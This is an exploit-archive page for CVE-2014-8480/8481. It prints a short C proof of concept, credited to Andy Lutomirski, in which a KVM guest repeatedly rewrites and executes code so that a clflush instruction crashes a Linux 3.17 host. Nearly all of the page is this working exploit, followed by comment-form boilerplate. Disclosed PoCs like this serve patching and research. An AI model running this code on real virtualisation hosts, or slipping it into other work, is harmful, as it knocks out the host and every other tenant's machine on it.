Linux 3.17 guest-triggerable KVM OOPS PoC

2014.10.24

Credit: Andy Lutomirski

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2014-8480 | CVE-2014-8481

CWE: N/A

// KVM clflush sploit (crashes a Linux 3.17 host)
// Copyright (c) 2014 Andy Lutomirski
#include <pthread.h>
#include <err.h>
#include <stdio.h>
#include <stdint.h>
#include <signal.h>
#include <setjmp.h>
#include <string.h>
#include <stdbool.h>
#include <sys/io.h>
asm (".pushsection .wtext, \"awx\"\n"
"badcode:\n\t"
"clflush (%rip)\n\t"
"ret\n"
".popsection");
extern volatile unsigned short badcode[];
static void *proc(void *ignored)
{
while (true)
badcode[0] = 0xae0f;
return NULL;
}
int main()
{
if (iopl(3) != 0)
err(1, "iopl");
pthread_t pth;
pthread_create(&pth, NULL, proc, NULL);
while (true) {
badcode[0] = 0x00e4;
asm volatile ("call badcode" : : : "ax", "flags");
}
}

References:

http://cxsecurity.com/issue/WLB-2014100149

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Linux 3.17 guest-triggerable KVM OOPS PoC

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.